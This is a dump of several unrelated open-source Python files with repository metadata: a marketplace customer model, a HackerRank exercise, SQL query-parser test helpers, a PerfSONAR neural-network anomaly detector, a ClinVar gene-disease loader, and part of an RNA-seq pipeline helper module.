salomax/Open-Marketplace | app/customer/models.py | 3 | 6096 | #!/usr/bin/env python
# coding: utf-8
#
# Copyright 2016, Marcos Salomão.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import datetime
from app import user
from app import util
from app.exceptions import NotFoundEntityException
from app.exceptions import IntegrityViolationException
from app.marketplace import models as marketplace
from google.appengine.ext import ndb
from google.appengine.api import search as search_api
__author__ = "Marcos Salomão"
__email__ = "[email protected]"
__copyright__ = "Copyright 2016, Marcos Salomão"
__license__ = "Apache 2.0"
# Index autocomplete cliente
CUSTOMER_NAME_INDEX = 'customer_autocomplete_index'
AUTOCOMPLETE_SEARCH_LIMIT = 5
# Index usage
# http://stackoverflow.com/questions/12899083/partial-matching-gae-search-api
def get_name_index():
""" Customer index by name.
"""
return search_api.Index(name=CUSTOMER_NAME_INDEX)
class CustomerModel(ndb.Model):
""" Customer model.
"""
# Name
name = ndb.StringProperty(required=True)
# Email
email = ndb.StringProperty(required=False)
# Phone
phone = ndb.StringProperty(required=False)
# Location
location = ndb.StringProperty(required=False)
# Log date at insert moment
created_date = ndb.DateTimeProperty(auto_now_add=True)
def update_index(customer):
""" Update index by customer id.
"""
# Create partials
name = ','.join(util.tokenize_autocomplete(customer.name))
# Create a doc
document = search_api.Document(
doc_id=str(customer.key.id()),
fields=[search_api.TextField(name='name', value=name)])
# Add doc to index
get_name_index().put(document)
def remove_index(_id):
""" Remove index by id.
"""
# Delete
get_name_index().delete(str(_id))
def get_customer_query():
""" Get customer model query.
"""
# Get user marketplace
marketplaceModel = marketplace.get_marketplace()
# Get query, notice marketplace as parent
query = CustomerModel.query(ancestor=marketplaceModel.key)
# Return query
return query
def get(id):
""" Get customer by its id.
"""
# Get marketplace
marketplaceModel = marketplace.get_marketplace()
# Get customer by id, notice marketplace as parent
customer = ndb.Key('CustomerModel', int(
id), parent=marketplaceModel.key).get()
# Return customer
return customer
def list():
"""Listar os clientes cadastrados na loja do usuário.
"""
# Realizando query, listando os clientes
customers = get_customer_query().order(CustomerModel.name).fetch()
logging.debug("Foram selecionado(s) %d clientes(s) cadastrados",
len(customers))
# Retornando
return customers
def search(customer):
""" Search
"""
# Build search by name using index
search_results = get_name_index().search(search_api.Query(
query_string="name:{name}".format(name=customer.name),
options=search_api.QueryOptions(limit=AUTOCOMPLETE_SEARCH_LIMIT)))
# Transport results do model
results = []
for doc in search_results:
# Get customer model
customer = get(int(doc.doc_id))
# Handle if not exists
if customer is not None:
results.append(customer)
else:
remove_index(doc.doc_id)
logging.warning(
'Index %s is not up-to-date to doc %s and it has removed!',
CUSTOMER_NAME_INDEX, doc.doc_id)
# Return
return results
@ndb.transactional
def save(customer):
""" Add or update a customer in datastore.
"""
# Get marketplace
marketplaceModel = marketplace.get_marketplace()
logging.debug("Get user marketplace")
# Get customer model if exists
# or instantiate one, instead.
if customer.id is not None:
customerModel = CustomerModel(id=int(customer.id),
parent=marketplaceModel.key)
else:
customerModel = CustomerModel(parent=marketplaceModel.key)
logging.debug("Customer model created")
# Pass values
customerModel.name = customer.name
customerModel.email = customer.email
customerModel.phone = customer.phone
customerModel.location = customer.location
    # Persist it
customerModel.put()
logging.debug("Customer id %d saved success to %s",
customerModel.key.id(), marketplaceModel.name)
# Update index
update_index(customerModel)
logging.debug("Index updated to customer id %s",
customerModel.key.id())
# Return
return customerModel
@ndb.transactional
def delete(id):
""" Remove customer by id.
"""
# Get marketplace
marketplaceModel = marketplace.get_marketplace()
# Get customer
customerKey = ndb.Key('CustomerModel', int(id), parent=marketplaceModel.key)
# Handle if not exists
if customerKey is None:
raise NotFoundEntityException(message='messages.customer.notfound')
# Are there sales with this customer,
# if true, is not possible to delete
from app.sale import models as sales
if sales.has_sales_by_customer(customerKey) == True:
raise IntegrityViolationException(
message='messages.customer.salesintegrityviolation')
logging.debug("Check constraint validation OK")
# Remove from datastore
customerKey.delete()
logging.debug("Customer id %s removed success!", id)
# Update index
remove_index(id)
logging.debug("Index updated to customer id %s", id)
| apache-2.0 | 3,363,991,501,939,403,300 | 24.383333 | 80 | 0.673342 | false | 3.958415 | false | false | false |
nabin-info/hackerrank.com | points-on-rectangle.py | 1 | 1308 | #!/usr/bin/python
import sys
def corners(pts):
#x0,xN,y0,yN = [ pts[0][0], pts[0][0], pts[0][1], pts[0][1] ]
## determine our bounds
x0 = pts[0][0]
y0 = pts[0][1]
xN = pts[0][0]
yN = pts[0][1]
for pt in pts:
if pt[0] < x0: x0 = pt[0]
if pt[1] < y0: y0 = pt[1]
if pt[0] > xN: xN = pt[0]
if pt[1] > yN: yN = pt[1]
#print pt[0], pt[1]
print "Bounds: ", (x0,y0), (xN,yN)
for pt in pts:
x, y = pt
if x == x0 or x == xN:
if y >= y0 and y <= yN:
print pt, ":\tYES"
else:
print pt, ":\tNO"
elif y == y0 or y == yN:
if x >= x0 and x <= xN:
print pt, ":\tYES"
else:
print pt, ":\tNO"
else:
print pt, ":\tNO"
nqry = int(raw_input())
for q in range(nqry):
npts = int(raw_input())
pts = []
for p in range(npts):
x, y = map(int, str(raw_input()).split(" "))
pts += [ (x,y) ]
print "\n",pts
corners(pts)
#for i in [ '42536258796157867'\
# , '4424444424442444'\
# , '5424644424442444'\
# , '5122-2368-7954 - 3214'\
# , '44244x4424442444'\
# , '0525362587961578']:
# print i, ":\t", is_valid_cc(i)
| mit | 4,406,431,563,262,053,400 | 22.781818 | 65 | 0.419725 | false | 2.554688 | false | false | false |
aipescience/queryparser | src/queryparser/testing/__init__.py | 1 | 2934 | # -*- coding: utf-8 -*-
import pytest
from queryparser.adql import ADQLQueryTranslator
from queryparser.mysql import MySQLQueryProcessor
from queryparser.postgresql import PostgreSQLQueryProcessor
from queryparser.exceptions import QueryError, QuerySyntaxError
def _test_parsing(query_processor, test, translate=False):
if len(test) == 6:
query, columns, keywords, functions, display_columns, tables = test
replace_schema_name = None
elif len(test) == 7:
query, columns, keywords, functions, display_columns, tables,\
replace_schema_name = test
if translate:
adt = ADQLQueryTranslator()
adt.set_query(query)
if query_processor == MySQLQueryProcessor:
query = adt.to_mysql()
elif query_processor == PostgreSQLQueryProcessor:
query = adt.to_postgresql()
if replace_schema_name is None:
qp = query_processor(query)
else:
qp = query_processor()
qp.set_query(query)
qp.process_query(replace_schema_name=replace_schema_name)
qp_columns = ['.'.join([str(j) for j in i[:3]]) for i in qp.columns
if i[0] is not None and i[1] is not None]
qp_display_columns = ['%s: %s' % (str(i[0]),
'.'.join([str(j) for j in i[1]]))
for i in qp.display_columns]
qp_tables = ['.'.join([str(j) for j in i]) for i in qp.tables
if i[0] is not None and i[1] is not None]
if columns is not None:
assert set(columns) == set(qp_columns)
if keywords is not None:
assert set([i.lower() for i in keywords]) == set(qp.keywords)
if functions is not None:
assert set(functions) == set(qp.functions)
if display_columns is not None:
assert set(display_columns) == set(qp_display_columns)
if tables is not None:
assert set(tables) == set(qp_tables)
def _test_syntax(query_processor, query):
with pytest.raises(QuerySyntaxError):
query_processor(query)
def _test_query(query_processor, query):
with pytest.raises(QueryError):
query_processor(query)
def _test_adql_translation(test):
query, translated_query, output = test
adt = ADQLQueryTranslator(query)
if translated_query is not None:
if output == 'mysql':
assert translated_query.strip() == adt.to_mysql()
elif output == 'postgresql':
assert translated_query.strip() == adt.to_postgresql()
def _test_indexed_adql_translation(test):
query, translated_query, iob, output = test
adt = ADQLQueryTranslator(query)
if translated_query is not None:
if output == 'postgresql':
tq = adt.to_postgresql()
qp = PostgreSQLQueryProcessor()
qp.set_query(tq)
qp.process_query(indexed_objects=iob)
assert translated_query.strip() == qp.query
| apache-2.0 | 5,287,945,565,792,071,000 | 31.6 | 75 | 0.620314 | false | 3.771208 | true | false | false |
ivukotic/ML_platform_tests | PerfSONAR/AD_nn.py | 1 | 8494 | #!/usr/bin/env python3
from elasticsearch import Elasticsearch, exceptions as es_exceptions
from elasticsearch.helpers import scan
from time import time
import numpy as np
import pandas as pd
# import tensorflow as tf - should do it by itself
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Dropout
from sklearn.model_selection import train_test_split
from pandas.tseries.offsets import *
# parameters. These should not change for one version (_type) of test.
alarm_index = 'ps_alarms'
alarm_type = 'NN v1'
ref = 24
sub = 1
ref = ref * Hour()
sub = sub * Hour()
# get a job from ES
# it takes one job earliest it time.
# it shouls also consider jobs that are "pending" but for too long.
es = Elasticsearch([{'host':'atlas-kibana.mwt2.org', 'port':9200}],timeout=60)
def getWorkload():
my_query = {
"size": 1,
"query":{
"bool":{
"must":[
{"term" : { "processed" : "no" }},
{"term" : { "_type" : alarm_type }}
]
}
},
"sort" : [
{"timestamp" : {"order" : "asc"}}
]
}
res = es.search(index=alarm_index, body=my_query, request_timeout=120)
#print(res)
hits = res['hits']['hits']
if len(hits)==0:
print('All done.')
return (0,0,0,1)
job_id = res['hits']['hits'][0]['_id']
job_source = res['hits']['hits'][0]['_source']
job_timestamp = job_source['timestamp']
site = job_source['site']
endpoint = job_source['endpoint']
print ('Processing id:',job_id, '\ttimebin:', job_timestamp, '\tsite:', site, '\tendpoint:', endpoint)
# setting a lock on the job
try:
es.update(index=alarm_index, doc_type=alarm_type, id=job_id, body={"doc": {"processed": "pending"}})
except es_exceptions.TransportError as e:
print ('TransportError ', e)
return (0,0,0,3)
# getting actual perfsonar data
end = pd.Timestamp(job_timestamp)
start = end - ref - sub
print('start:', start, '\tend:', end)
indices = "network_weather-2017.*"
my_query = {
'query': {
'bool':{
'must':[
{'range': {'timestamp': {'gte': start.strftime('%Y%m%dT%H%M00Z'), 'lt': end.strftime('%Y%m%dT%H%M00Z')}}},
{'bool':
{'should':[
{'term': {'src': endpoint}},
#{'term': {'src': srcSiteThroughputServer}},
#{'term': {'src': destSiteOWDServer}},
#{'term': {'src': destSiteThroughputServer}}
]}
},
{'bool':
{'should':[
{'term': {'_type': 'packet_loss_rate'}},
#{'term': {'_type': 'latency'}},
#{'term': {'_type': ''}},
#{'term': {'_type': ''}}
]}
}
]
}
}
}
scroll = scan(client=es, index=indices, query=my_query)
#scan the data
count = 0
allData={} # will be like this: {'dest_host':[[timestamp],[value]], ...}
for res in scroll:
# if count<2: print(res)
if not count%100000: print(count)
if count>1000000: break
dst = res['_source']['dest'] # old data - dest, new data - dest_host
if dst not in allData: allData[dst]=[[],[]]
allData[dst][0].append(res['_source']['timestamp'] )
allData[dst][1].append(res['_source']['packet_loss'])
count=count+1
dfs=[]
for dest,data in allData.items():
ts=pd.to_datetime(data[0],unit='ms')
df=pd.DataFrame({dest:data[1]}, index=ts )
df.sort_index(inplace=True)
df.index = df.index.map(lambda t: t.replace(second=0))
df = df[~df.index.duplicated(keep='last')]
dfs.append(df)
#print(df.head(2))
print('docs read:', count)
if len(dfs)<2: return (job_id,0,0,2)
full_df = pd.concat(dfs, axis=1)
print(full_df.shape)
# fix NANs
full_df.fillna(0, inplace=True)
return (job_id, end, full_df, 0)
def scaled_accuracy(accuracy, ref_samples, sub_samples):
chance = float(ref_samples)/(ref_samples+sub_samples)
print('chance:', chance)
print('actual accuracy:', accuracy)
rescale = 1/(1 - chance)
return (accuracy-chance)*rescale
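# Worked example (illustrative): with 75 reference and 25 subject samples the chance
# level is 75 / 100 = 0.75, so a raw accuracy of 0.875 rescales to
# (0.875 - 0.75) / (1 - 0.75) = 0.5.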
# create Network Model
class ANN(object):
def __init__(self, end, data):
self.n_series = data.shape[1]
self.df = data
self.lend = end
self.nn = Sequential()
self.nn.add(Dense(units=self.n_series*2, input_shape=(self.n_series,), activation='relu' ))
# self.nn.add(Dropout(0.5))
self.nn.add(Dense(units=self.n_series, activation='relu'))
# self.nn.add(Dropout(0.5))
self.nn.add(Dense(units=1, activation='sigmoid'))
# self.nn.compile(loss='hinge', optimizer='sgd', metrics=['binary_accuracy'])
# self.nn.compile(loss='mse',optimizer='rmsprop', metrics=['accuracy'])
self.nn.compile(loss='binary_crossentropy',optimizer='rmsprop', metrics=['accuracy'])
# self.nn.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['binary_accuracy'])
self.nn.summary()
def check_for_anomaly(self):
lstart = self.df.index.min()
# lend = self.df.index.max()
#round start
lstart.seconds=0
lstart.minutes=0
print(lstart, self.lend)
ti = self.lend - sub
# ti = lstart + ref
startt = time()
ref_df = self.df[ (self.df.index < ti)]
sub_df = self.df[(self.df.index >= ti)]
if ref_df.shape[0] < 32 or sub_df.shape[0]<32:
return -999
y_ref = pd.Series([0] * ref_df.shape[0])
X_ref = ref_df
y_sub = pd.Series([1] * sub_df.shape[0])
X_sub = sub_df
# separate Reference and Subject into Train and Test
X_ref_train, X_ref_test, y_ref_train, y_ref_test = train_test_split(X_ref, y_ref, test_size=0.3, random_state=42)
X_sub_train, X_sub_test, y_sub_train, y_sub_test = train_test_split(X_sub, y_sub, test_size=0.3, random_state=42)
# combine training ref and sub samples
X_train = pd.concat([X_ref_train, X_sub_train])
y_train = pd.concat([y_ref_train, y_sub_train])
# combine testing ref and sub samples
X_test = pd.concat([X_ref_test, X_sub_test])
y_test = pd.concat([y_ref_test, y_sub_test])
X_train = X_train.reset_index(drop=True)
y_train = y_train.reset_index(drop=True)
X_train_s, y_train_s = shuffle(X_train, y_train)
hist = self.nn.fit(X_train_s.values, y_train_s.values, epochs=100, verbose=0, shuffle=True, batch_size=10)
loss_and_metrics = self.nn.evaluate(X_test.values, y_test.values)#, batch_size=256)
print(loss_and_metrics)
print('\n',ti,"\trefes:" , ref_df.shape, "\tsubjects:", sub_df.shape, '\taccuracy:', loss_and_metrics)
print("took:", time()-startt)
return scaled_accuracy(loss_and_metrics[1], ref_df.shape[0], sub_df.shape[0])
# run it
while (True):
body={"doc": {"processed": "yes"}}
(job_id, timestamp, data, status) = getWorkload()
if status == 1:
print('All done.')
break
elif status == 2:
print('Not enough data.')
try:
es.update(index=alarm_index, doc_type=alarm_type, id=job_id, body=body)
except es_exceptions.TransportError as e:
print ('TransportError on not enough data update', e)
continue
elif status == 3:
print('Probably already done.')
else:
ann = ANN(timestamp, data)
rescaled_accuracy = ann.check_for_anomaly()
#update state and value
if rescaled_accuracy != -999: body['doc']['rescaled'] = rescaled_accuracy
try:
es.update(index=alarm_index, doc_type=alarm_type, id=job_id, body=body)
except es_exceptions.TransportError as e:
print ('TransportError on result update', e)
| gpl-3.0 | 5,875,079,378,249,073,000 | 32.440945 | 130 | 0.541912 | false | 3.496912 | true | false | false |
magdamagda/geny-chorobowe | geny_chorobowe/find_disease_genes/clinvar.py | 1 | 3242 | from urllib2 import urlopen
from datetime import datetime
from django.db import transaction
from models import *
import logging
logger = logging.getLogger(__name__)
sourcePath = "ftp://ftp.ncbi.nlm.nih.gov/pub/clinvar/gene_condition_source_id"
def updateDiseasesList():
	# first, remove all the diseases from the database
ClinvarDisease.objects.all().delete()
ClinvarSource.objects.all().delete()
ClinvarGene.objects.all().delete()
	# and download all of them again from scratch
req = urlopen(sourcePath)
data = req.read()
diseases = {}
genesDict = {}
genes = {}
sources = {}
lines = data.split("\n")
lines.pop(0)
for line in lines:
if len(line)>0:
pola = line.split("\t")
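			# Column layout as used below (tab-separated): 0 gene ID, 1 gene name,
			# 2 concept ID, 3 disease name, 4 source name, 5 source ID,
			# 6 disease MIM, 7 last-modified date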
lastmod = datetime.strptime(pola[7], '%d %b %Y').strftime('%Y-%m-%d')
concept = pola[2]
sourceId = convertToIntIfPossible(pola[5])
diseases[concept]=[pola[3], sourceId, pola[6], lastmod] #concept : name, sourceID, mim, last_mod
if not concept in genesDict:
genesDict[concept] = []
genesDict[concept].append(pola[0])
genes[pola[0]] = pola[1] #id : name
if not sourceId == None:
sources[pola[5]]= pola[4] #id : name
#insert genes
with transaction.atomic():
for g in genes:
ClinvarGene.objects.create(GeneName = genes[g] , GeneID = g)
#insert sources
with transaction.atomic():
for s in sources:
ClinvarSource.objects.create(SourceName = sources[s] , SourceID = s)
#insert diseases
with transaction.atomic():
for d in diseases:
			source = None
			if not diseases[d][1] is None:
				source = ClinvarSource.objects.get(SourceID=diseases[d][1])
			disease = ClinvarDisease(DiseaseName = diseases[d][0], Source = source, LastModified = diseases[d][3], ConceptID=d, DiseaseMIM = diseases[d][2] )
disease.save()
for gene in genesDict[d]:
disease.Genes.add(ClinvarGene.objects.get(GeneID = gene))
def getDiseasesFromDatabase(name=None, gene=None, fromDate=None, toDate=None, page=0, pageSize = 20):
diseases = ClinvarDisease.objects.all()
if not name is None and not name=="":
diseases = diseases.filter(DiseaseName__contains = name)
if not gene is None and not gene=="":
		diseases = diseases.filter(Genes__GeneName = gene)
if not fromDate is None and not fromDate=="":
diseases = diseases.filter(LastModified__gte = fromDate)
if not toDate is None and not toDate=="":
diseases = diseases.filter(LastModified__lte = toDate)
diseases=diseases.order_by('-LastModified')
offset = page*pageSize
diseases = diseases[offset : offset + pageSize + 1]
nextPage=False
if len(diseases) > pageSize:
nextPage = True
	return diseases[0:pageSize], nextPage
def convertToIntIfPossible(val):
try:
return int(val)
except Exception:
return None
def diseaseDetails(ID):
try:
disease = ClinvarDisease.objects.get(ConceptID = ID)
return disease
except Exception as e:
return None
def geneDetails(ID):
try:
gene = ClinvarGene.objects.get(GeneID = ID)
return gene
except Exception as e:
return None
def diseaseGenes(ID):
try:
disease = ClinvarDisease.objects.get(ConceptID = ID)
return disease.Genes.all()
except Exception as e:
return []
def geneDiseases(ID):
try:
gene = ClinvarGene.objects.get(GeneID = ID)
return gene.clinvardisease_set.all()
except Exception as e:
return [] | gpl-2.0 | -3,142,552,447,835,035,600 | 28.481818 | 148 | 0.710056 | false | 2.677126 | false | false | false |
mlundblad/telepathy-gabble | tests/twisted/search/ceci-nest-pas-un-serveur.py | 4 | 6299 | """
Tests requesting search channels to, and performing contact searches against,
fake servers which are broken in various ways.
"""
import dbus
from twisted.words.protocols.jabber.client import IQ
from twisted.words.xish import domish
from gabbletest import exec_test, send_error_reply, make_result_iq
from servicetest import (
call_async, unwrap, make_channel_proxy, EventPattern, assertDBusError
)
from pprint import pformat
import constants as cs
import ns
def call_create(q, conn, server):
"""
Calls CreateChannel for the given contact search server, and returns the IQ
stanza received by the server.
"""
request = dbus.Dictionary(
{
cs.CHANNEL_TYPE: cs.CHANNEL_TYPE_CONTACT_SEARCH,
cs.CONTACT_SEARCH_SERVER: server,
}, signature='sv')
call_async(q, conn.Requests, 'CreateChannel', request)
iq_event = q.expect('stream-iq', to=server, query_ns=ns.SEARCH)
return iq_event.stanza
def not_a_search_server(q, stream, conn):
iq = call_create(q, conn, 'notajud.localhost')
e = domish.Element((None, 'error'))
e['type'] = 'cancel'
e.addElement((ns.STANZA, 'service-unavailable'))
send_error_reply(stream, iq, e)
event = q.expect('dbus-error', method='CreateChannel')
assertDBusError(cs.NOT_AVAILABLE, event.error)
def returns_invalid_fields(q, stream, conn):
iq = call_create(q, conn, 'broken.localhost')
result = make_result_iq(stream, iq)
query = result.firstChildElement()
for f in ["first", "shoe-size", "nick", "star-sign"]:
query.addElement(f)
stream.send(result)
event = q.expect('dbus-error', method='CreateChannel')
assertDBusError(cs.NOT_AVAILABLE, event.error)
def returns_error_from_search(q, stream, conn):
server = 'nofunforyou.localhost'
iq = call_create(q, conn, server)
result = make_result_iq(stream, iq)
query = result.firstChildElement()
query.addElement("first")
stream.send(result)
event = q.expect('dbus-return', method='CreateChannel')
c = make_channel_proxy(conn, event.value[0], 'Channel')
c_search = dbus.Interface(c, cs.CHANNEL_TYPE_CONTACT_SEARCH)
call_async(q, c_search, 'Search', {'x-n-given': 'World of Goo'})
iq_event, _ = q.expect_many(
EventPattern('stream-iq', to=server, query_ns=ns.SEARCH),
EventPattern('dbus-signal', signal='SearchStateChanged'),
)
iq = iq_event.stanza
error = domish.Element((None, 'error'))
error['type'] = 'modify'
error.addElement((ns.STANZA, 'not-acceptable'))
error.addElement((ns.STANZA, 'text'), content="We don't believe in games here.")
send_error_reply(stream, iq, error)
ssc = q.expect('dbus-signal', signal='SearchStateChanged')
new_state, reason, details = ssc.args
assert new_state == cs.SEARCH_FAILED, new_state
assert reason == cs.PERMISSION_DENIED, reason
# We call stop after the search has failed; it should succeed and do nothing.
call_async(q, c_search, 'Stop')
event = q.expect('dbus-return', method='Stop')
c.Close()
def returns_bees_from_search(q, stream, conn):
server = 'hivemind.localhost'
iq = call_create(q, conn, server)
result = make_result_iq(stream, iq)
query = result.firstChildElement()
query.addElement("nick")
stream.send(result)
event = q.expect('dbus-return', method='CreateChannel')
c = make_channel_proxy(conn, event.value[0], 'Channel')
c_search = dbus.Interface(c, cs.CHANNEL_TYPE_CONTACT_SEARCH)
call_async(q, c_search, 'Search', {'nickname': 'Buzzy'})
iq_event, _ = q.expect_many(
EventPattern('stream-iq', to=server, query_ns=ns.SEARCH),
EventPattern('dbus-signal', signal='SearchStateChanged'),
)
iq = iq_event.stanza
result = IQ(stream, 'result')
result['id'] = iq['id']
result['from'] = iq['to']
result.addElement((ns.SEARCH, 'bees')).addElement('bzzzzzzz')
stream.send(result)
ssc = q.expect('dbus-signal', signal='SearchStateChanged')
new_state, reason, details = ssc.args
assert new_state == cs.SEARCH_FAILED, new_state
assert reason == cs.NOT_AVAILABLE, reason
# We call stop after the search has failed; it should succeed and do nothing.
call_async(q, c_search, 'Stop')
event = q.expect('dbus-return', method='Stop')
c.Close()
def disconnected_before_reply(q, stream, conn):
iq = call_create(q, conn, 'slow.localhost')
call_async(q, conn, 'Disconnect')
event = q.expect('dbus-error', method='CreateChannel')
assertDBusError(cs.DISCONNECTED, event.error)
def forbidden(q, stream, conn):
iq = call_create(q, conn, 'notforyou.localhost')
e = domish.Element((None, 'error'))
e['type'] = 'cancel'
e.addElement((ns.STANZA, 'forbidden'))
send_error_reply(stream, iq, e)
event = q.expect('dbus-error', method='CreateChannel')
assertDBusError(cs.PERMISSION_DENIED, event.error)
def invalid_jid(q, stream, conn):
iq = call_create(q, conn, 'invalid.localhost')
e = domish.Element((None, 'error'))
e['type'] = 'cancel'
e.addElement((ns.STANZA, 'jid-malformed'))
send_error_reply(stream, iq, e)
event = q.expect('dbus-error', method='CreateChannel')
assertDBusError(cs.INVALID_ARGUMENT, event.error)
def really_invalid_jid(q, stream, conn):
request = dbus.Dictionary(
{
cs.CHANNEL_TYPE: cs.CHANNEL_TYPE_CONTACT_SEARCH,
cs.CONTACT_SEARCH_SERVER: 'this is literally bullshit',
}, signature='sv')
call_async(q, conn.Requests, 'CreateChannel', request)
# If the JID is actually malformed, we shouldn't even get as far as trying
# to talk to it.
event = q.expect('dbus-error', method='CreateChannel')
assertDBusError(cs.INVALID_ARGUMENT, event.error)
def test(q, bus, conn, stream):
not_a_search_server(q, stream, conn)
returns_invalid_fields(q, stream, conn)
returns_error_from_search(q, stream, conn)
returns_bees_from_search(q, stream, conn)
forbidden(q, stream, conn)
invalid_jid(q, stream, conn)
really_invalid_jid(q, stream, conn)
disconnected_before_reply(q, stream, conn)
stream.sendFooter()
q.expect('dbus-return', method='Disconnect')
if __name__ == '__main__':
exec_test(test)
| lgpl-2.1 | -4,594,219,973,480,346,600 | 31.469072 | 84 | 0.662962 | false | 3.29618 | true | false | false |
adam-rabinowitz/ngs_python | scripts/RNASeq_Pipeline_EMBL/EMBL_RNASeq_Functions.py | 2 | 16201 | import collections
import itertools
import os
import re
def parseModuleFile(modulefile):
''' Function to parse module file.
Args:
modulefile (str)- Path to tab-delimited file containing module data.
The first and second columns are required and are the program and
the program path. Additional columns should list the modules
required for the program.
Returns:
pathDict (dict)- A dictionary where the key is the program and the
value is the path
moduleDict (dict)- A dictionary where the key is the program and the
value is a list of required modules.
'''
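    # Hypothetical example line in the module file (tab-separated):
    #   cutadapt<TAB>/usr/local/bin/cutadapt<TAB>python/2.7<TAB>cutadapt/1.9
    # which would give pathDict['cutadapt'] = '/usr/local/bin/cutadapt' and
    # moduleDict['cutadapt'] = ['python/2.7', 'cutadapt/1.9'].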
# Create output variables
pathDict = {}
moduleDict = {}
# Import each line as a list
with open(modulefile) as infile:
for line in infile:
linedata = line.strip().split('\t')
# Extract and store data
program = linedata[0]
path = linedata[1]
modules = linedata[2:]
pathDict[program] = path
moduleDict[program] = modules
# Return data
return(pathDict, moduleDict)
def parseSampleFile(samplefile):
''' Function to parse sample file.
Args:
samplefile (str)- Path to tab-delimited file containing sample data.
The first column is the sample name which will be used as a prefix
for all outut files. The second column should be the prefix for
the identification of FASTQ files. Additional columns should list
directories in which to search for FASTQ files.
Returns:
sampleDict (dict)- A collections ordered dictionary where the key
is the sample name and the value in a tuple where the first
element is the prefix and the second element is a list of
directories.
'''
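    # Hypothetical example line in the sample file (tab-separated):
    #   sampleA<TAB>sampleA_S1<TAB>/data/run1<TAB>/data/run2
    # which would give sampleDict['sampleA'] = ('sampleA_S1',
    # ['/data/run1', '/data/run2']).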
# Create output variable
sampleDict = collections.OrderedDict()
prefixList = []
# Import each line of the file as list
with open(samplefile) as infile:
for line in infile:
linedata = line.strip().split('\t')
# Extract and store data
name = linedata[0]
prefix = linedata[1]
indirs = linedata[2:]
if len(indirs) < 1:
raise IOError('No input directores for {}'.format(name))
sampleDict[name] = (prefix, indirs)
prefixList.append(prefix)
# Check prefixes will identify unique files
for p1, p2 in itertools.permutations(prefixList, 2):
if p1.startswith(p2):
raise IOError("prefices '{}' and '{}' overlap".format(p1, p2))
# Return output
return(sampleDict)
def parseParameterFile(paramfile):
''' Function to parse parameter file
Args:
        paramfile (str)- Path to tab-delimited parameter file.
    Returns:
        paramDict (dict)- A dictionary of all parameters for analysis.
'''
# Create and populate parameter file
paramDict = {}
with open(paramfile) as infile:
for line in infile:
# Skip comment lines
if line.startswith('#'):
continue
# Extract data and try type conversion
param, value = line.strip().split('\t')
try:
value = int(value)
except ValueError:
try:
value = float(value)
except ValueError:
pass
# Store data
paramDict[param] = value
# Return data
return(paramDict)
def parseIndexFile(indexfile):
''' Function to parse index file
Args:
        indexfile (str)- Path to tab-delimited index file.
    Returns:
        indexDict (dict)- A dictionary of all index entries for analysis.
'''
# Create and populate index dictionary
indexDict = {}
with open(indexfile) as infile:
for line in infile:
# Extract data and try type conversion
param, value = line.strip().split('\t')
indexDict[param] = value
# Return data
return(indexDict)
def findFastq(prefix, dirList):
''' A function to identify FASTQ files from directories
using a supplied filename prefix
Args:
prefix (str)- Prefix of the FASTQ files to be found.
dirList (list)- A list of directories to search.
Returns:
read1 (list)- A list of read1 FASTQ files
read2 (list)- A list of read2 FASTQ files
'''
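    # For example (illustrative file names): the prefix 'sampleA_S1' matches
    # 'sampleA_S1_L001_R1_001.fastq.gz' and is paired with
    # 'sampleA_S1_L001_R2_001.fastq.gz' when that file exists in the same directory.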
# Create variables to store results
read1 = []
read2 = []
# Create regular expression to find files
prefix = re.escape(prefix)
read1Pattern = re.compile(prefix + '.*?R1(_\\d{3}){0,1}\\.fastq.gz$')
# Loop through directories to find fastq files
for directory in dirList:
# Loop through file names and find read1 files
filenames = os.listdir(directory)
for f in filenames:
if re.match(read1Pattern, f):
read1.append(os.path.join(directory, f))
# Find and store matching read2 files
read2File, nsub = re.subn(
'R1(?=(_\\d{3}){0,1}\\.fastq.gz$)', 'R2', f)
if nsub != 1:
raise IOError('Could not generate read2 filename'\
' for %s' %(f))
if read2File in filenames:
read2.append(os.path.join(directory, read2File))
# Check output files and return
if len(read1) == 0:
raise IOError('{}: No FASTQ files found'.format(prefix))
if len(read2) and len(read1) != len(read2):
raise IOError('{}: Mixed single- and paired-end'.format(prefix))
return(read1, read2)
def createOutFiles(outdir, sample):
''' Function to create output files for analysis
Args:
outdir (str)- Path to output directory
sample (str)- Sample name
Returns
outDict (dict)- Dictionary of output files.
'''
# Create variable to store files
outfiles = {}
# Create output directories and output prefix
sampledir = os.path.join(outdir, sample)
if not os.path.isdir(sampledir):
os.mkdir(sampledir)
outprefix = os.path.join(sampledir, sample) + '.'
# Store directories, prefixes and job file
outfiles['prefix'] = outprefix
outfiles['outdir'] = sampledir
outfiles['slurm'] = outprefix + 'slurm'
# Create file names for processing FASTQ files
outfiles['cat1'] = outprefix + 'R1.fastq.gz'
outfiles['cat2'] = outprefix + 'R2.fastq.gz'
outfiles['trim1'] = outprefix + 'trim.R1.fastq.gz'
outfiles['trim2'] = outprefix + 'trim.R2.fastq.gz'
outfiles['fastqclog'] = outprefix + 'fastqc.log'
outfiles['trimlog'] = outprefix + 'cutadapt.metrics'
# Create file names for processing BAM files
outfiles['starbam'] = outprefix + 'Aligned.out.bam'
outfiles['starlog'] = outprefix + 'star.log'
outfiles['sortbam'] = outprefix + 'sort.bam'
outfiles['sortlog'] = outprefix + 'sort.log'
outfiles['mdupbam'] = outprefix + 'mdup.bam'
outfiles['mduplog1'] = outprefix + 'mdup.metrics'
outfiles['mduplog2'] = outprefix + 'mdup.log'
# Create output files for htseq
outfiles['htseqlog'] = outprefix + 'htseq.log'
outfiles['genecounts'] = outprefix + 'gene_counts.txt'
# Create file names for QC of BAM files
outfiles['metrlog1'] = outprefix + 'collectrna.metrics'
outfiles['metrlog2'] = outprefix + 'collectrna.log'
outfiles['alsumlog1'] = outprefix + 'alignsum.metrics'
outfiles['alsumlog2'] = outprefix + 'alignsum.log'
# Return data
return(outfiles)
def fastQC(inFile, outDir, path):
''' This function performs a FastQC analysis on a fastq file and
then organises the output data. Function is built for version 0.11.2
of FastQC. Function takes three arguments:
1) inFile - Input FASTQ file.
2) outDir - Output directory.
